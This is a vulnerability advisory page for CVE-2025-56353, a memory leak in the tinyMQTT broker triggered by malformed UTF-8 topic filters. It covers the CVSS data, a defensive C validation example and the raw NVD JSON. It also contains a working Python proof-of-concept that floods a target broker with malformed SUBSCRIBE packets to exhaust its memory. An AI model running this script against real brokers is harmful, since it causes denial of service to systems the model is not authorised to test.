Security Vulnerability Report
CVE-2025-56353 CVSS 7.5 HIGH

CVE-2025-56353

Published: 2026-01-20 16:16:06
Last Modified: 2026-02-03 21:54:46

Description

In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), a memory leak occurs due to the broker's failure to validate or reject malformed UTF-8 strings in topic filters. An attacker can exploit this by sending repeated subscription requests with arbitrarily large or invalid filter payloads. Each request causes memory to be allocated for the malformed topic filter, but the broker does not free the associated memory, leading to unbounded heap growth and potential denial of service under sustained attack.
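The broker-side check the description says is missing, as an added example that is not tinyMQTT's code: each topic filter in a SUBSCRIBE payload is checked against the MQTT 3.1.1 UTF-8 rules (section 1.5.3: well-formed UTF-8, no U+0000, and therefore no overlong forms, surrogates or code points above U+10FFFF) and against a length cap before anything is allocated for it, so a rejected filter never owns heap memory and there is no release path to forget. The function and type names (mqtt_utf8_valid, topic_filter_parse, subscribe_payload_validate, tf_status) and the per-filter cap are this example's own assumptions, not identifiers from the project; the packets in the comments are constructed for illustration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Status codes for this example (not tinyMQTT's). subscribe_payload_validate()
 * returns them negated so that a filter count and an error share one int. */
enum tf_status { TF_OK = 0, TF_TRUNCATED = 1, TF_TOO_LONG = 2,
                 TF_BAD_UTF8 = 3, TF_NOMEM = 4, TF_BAD_QOS = 5 };

/* MQTT 3.1.1 section 1.5.3: string data must be well-formed UTF-8 and must
 * not encode U+0000; UTF-8 itself forbids overlong forms, surrogates
 * (U+D800..U+DFFF) and code points above U+10FFFF. Returns 1 if valid. */
int mqtt_utf8_valid(const uint8_t *s, size_t len)
{
    size_t i = 0;
    while (i < len) {
        uint8_t b = s[i];
        if (b < 0x80) {
            if (b == 0x00) return 0;            /* U+0000 is forbidden in MQTT */
            i++;
            continue;
        }
        size_t n = 0; uint32_t cp = 0, min = 0;
        if ((b & 0xE0) == 0xC0)      { n = 2; cp = b & 0x1F; min = 0x80; }
        else if ((b & 0xF0) == 0xE0) { n = 3; cp = b & 0x0F; min = 0x800; }
        else if ((b & 0xF8) == 0xF0) { n = 4; cp = b & 0x07; min = 0x10000; }
        else return 0;                          /* stray continuation byte or 0xF8+ lead */
        if (i + n > len) return 0;              /* sequence cut off by the length prefix */
        for (size_t k = 1; k < n; k++) {
            if ((s[i + k] & 0xC0) != 0x80) return 0;
            cp = (cp << 6) | (s[i + k] & 0x3F);
        }
        if (cp < min || cp > 0x10FFFF) return 0;      /* overlong or out of range */
        if (cp >= 0xD800 && cp <= 0xDFFF) return 0;   /* UTF-16 surrogate */
        i += n;
    }
    return 1;
}

typedef struct { char *bytes; size_t len; } topic_filter_t;

/* Parse one length-prefixed string field (2-byte big-endian length, then
 * bytes). Every check runs on the caller's buffer before malloc(), so a
 * rejected filter never reaches the heap. On TF_OK the caller owns *out. */
int topic_filter_parse(const uint8_t *buf, size_t buflen, size_t *consumed,
                       topic_filter_t *out, size_t max_len)
{
    out->bytes = NULL; out->len = 0; *consumed = 0;
    if (buflen < 2) return TF_TRUNCATED;
    size_t len = ((size_t)buf[0] << 8) | buf[1];
    if (len > max_len) return TF_TOO_LONG;      /* cap chosen by the deployment (assumed) */
    if (2 + len > buflen) return TF_TRUNCATED;
    if (!mqtt_utf8_valid(buf + 2, len)) return TF_BAD_UTF8;
    char *copy = malloc(len + 1);
    if (copy == NULL) return TF_NOMEM;
    memcpy(copy, buf + 2, len);
    copy[len] = '\0';
    out->bytes = copy; out->len = len; *consumed = 2 + len;
    return TF_OK;
}

void topic_filter_free(topic_filter_t *tf)
{
    free(tf->bytes);
    tf->bytes = NULL; tf->len = 0;
}

/* Walk a SUBSCRIBE payload: 2-byte packet id, then (filter, QoS) pairs.
 * Returns the number of filters, or a negative tf_status at the first
 * rejection; a broker would then drop the packet and close the connection. */
int subscribe_payload_validate(const uint8_t *buf, size_t buflen, size_t max_len)
{
    if (buflen < 2) return -TF_TRUNCATED;
    size_t pos = 2;
    int count = 0;
    while (pos < buflen) {
        topic_filter_t tf;
        size_t used = 0;
        int st = topic_filter_parse(buf + pos, buflen - pos, &used, &tf, max_len);
        if (st != TF_OK) return -st;
        topic_filter_free(&tf);                  /* a real broker would store it instead */
        pos += used;
        if (pos >= buflen) return -TF_TRUNCATED; /* QoS byte missing */
        if (buf[pos] > 2) return -TF_BAD_QOS;
        pos++;
        count++;
    }
    return count > 0 ? count : -TF_TRUNCATED;    /* MQTT-3.8.3-3: at least one pair */
}
```

The ordering is the point: bounding the length and validating the bytes on the receive buffer means the allocation for a filter only happens for input the broker is going to keep. MQTT 3.1.1 treats an ill-formed string as a protocol violation that ends the connection, so a rejected filter also costs the client its session rather than letting it loop. On the monitoring side, a rising broker RSS together with a high rate of rejected SUBSCRIBEs from one client is the signal to alert on for this class of bug.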

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:justdoit0910:tinymqtt:2024-02-18:*:*:*:*:*:*:* - VULNERABLE
tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18) and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-56353 PoC - tinyMQTT Memory Leak via Malformed UTF-8 Topic Filters

This PoC demonstrates sending MQTT SUBSCRIBE packets with malformed UTF-8
topic filters to trigger memory leak in tinyMQTT broker.
"""

import socket
import time
import struct


def create_mqtt_connect_packet(client_id):
    """Create MQTT CONNECT packet"""
    payload = b'\x00\x04MQTT'  # Protocol name
    payload += b'\x04'  # Protocol level 4 (MQTT 3.1.1)
    payload += b'\x02'  # Connect flags
    payload += struct.pack('>H', 60)  # Keep alive 60s
    payload += struct.pack('>H', len(client_id)) + client_id.encode()

    packet = b'\x10'  # CONNECT packet type
    packet += bytes([len(payload)]) + payload
    return packet


def create_mqtt_subscribe_packet_with_malformed_utf8(packet_id, topic_filter):
    """Create MQTT SUBSCRIBE packet with malformed UTF-8 topic filter"""
    # Topic filter with malformed UTF-8 bytes
    malformed_topic = topic_filter.encode('utf-8') + b'\x80\x80\x80'

    payload = struct.pack('>H', packet_id)
    payload += struct.pack('>H', len(malformed_topic)) + malformed_topic
    payload += b'\x00'  # QoS 0

    packet = b'\x82'  # SUBSCRIBE packet type
    packet += bytes([len(payload)]) + payload
    return packet


def exploit_tinymqtt(host, port, num_requests=1000):
    """
    Exploit function to trigger memory leak
    """
    print(f"[*] Connecting to tinyMQTT broker at {host}:{port}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))

    # Send CONNECT packet
    connect_packet = create_mqtt_connect_packet("malformed_utf8_test")
    sock.send(connect_packet)
    print("[*] Sent CONNECT packet")

    # Wait for CONNACK
    time.sleep(0.5)

    # Send SUBSCRIBE packets with malformed UTF-8 topic filters
    print(f"[*] Sending {num_requests} SUBSCRIBE packets with malformed UTF-8...")
    for i in range(num_requests):
        malformed_topic = f"test/topic/{'A' * i}\x80\x80"
        subscribe_packet = create_mqtt_subscribe_packet_with_malformed_utf8(i + 1, malformed_topic)
        sock.send(subscribe_packet)
        if i % 100 == 0:
            print(f"[*] Sent {i} malformed subscription requests")

    print("[+] Attack completed. Monitor broker memory usage for leak.")
    sock.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_host> <target_port> [num_requests]")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    num_requests = int(sys.argv[3]) if len(sys.argv) > 3 else 1000
    exploit_tinymqtt(host, port, num_requests)

References

https://github.com/JustDoIt0910/tinyMQTT/issues/19 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-56353",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T16:16:05.700",
    "lastModified": "2026-02-03T21:54:46.370",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), a memory leak occurs due to the broker's failure to validate or reject malformed UTF-8 strings in topic filters. An attacker can exploit this by sending repeated subscription requests with arbitrarily large or invalid filter payloads. Each request causes memory to be allocated for the malformed topic filter, but the broker does not free the associated memory, leading to unbounded heap growth and potential denial of service under sustained attack."
      },
      {
        "lang": "es",
        "value": "En el commit 6226ade15bd4f97be2d196352e64dd10937c1962 (18-02-2024) de tinyMQTT, se produce una fuga de memoria debido a que el bróker no valida ni rechaza cadenas UTF-8 mal formadas en los filtros de temas. Un atacante puede explotar esto enviando solicitudes de suscripción repetidas con cargas útiles de filtro arbitrariamente grandes o inválidas. Cada solicitud provoca que se asigne memoria para el filtro de tema mal formado, pero el bróker no libera la memoria asociada, lo que lleva a un crecimiento ilimitado del heap y a una posible denegación de servicio bajo un ataque sostenido."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-401"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:justdoit0910:tinymqtt:2024-02-18:*:*:*:*:*:*:*",
                "matchCriteriaId": "14948FD3-EF8A-4D2B-8510-47E9E20E51B9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/JustDoIt0910/tinyMQTT/issues/19",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]
      }
    ]
  }
}